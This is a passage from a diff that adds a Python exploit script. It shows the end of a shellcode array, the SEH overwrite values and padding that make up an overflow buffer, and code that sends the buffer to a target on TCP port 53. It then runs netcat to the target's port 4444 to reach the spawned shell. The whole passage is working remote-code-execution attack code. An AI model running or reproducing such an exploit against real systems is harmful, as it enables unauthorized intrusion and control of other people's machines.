+"\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef"
+"\x39\x64\x5f\x9a\x3d\xdb\x60\x8f"
+)
+
+nSEH = '\xeb\x06\x90\x90'
+SEH = '\xd1\x07\xfc\x7f'
+opcode = "\xe9\xdf\xf6\xff\xff"
+junk = 'A' * (2324 - len(shellcode))
+padding = 'A' * 600
+
+buff = shellcode + junk + nSEH + SEH + opcode + padding
+
+print "[+] Connecting to %s:53" % (host)
+try:
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.connect((host, 53))
+	aix= shellcode + 'A' * (2324 - len(shellcode)) 
+	print "[*] Sending payload.." + " shellcode: " + str(len(shellcode))
+	s.send(buff)
+	print "[*] Exploit Sent Successfully!"
+	s.close()
+    	print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444\r"
+    	time.sleep(5)
+	os.system ("nc -n " + host + " 4444")
+except:	
+	print "[!] Could not connect to " + host + ":53\r"
+        sys.exit(0)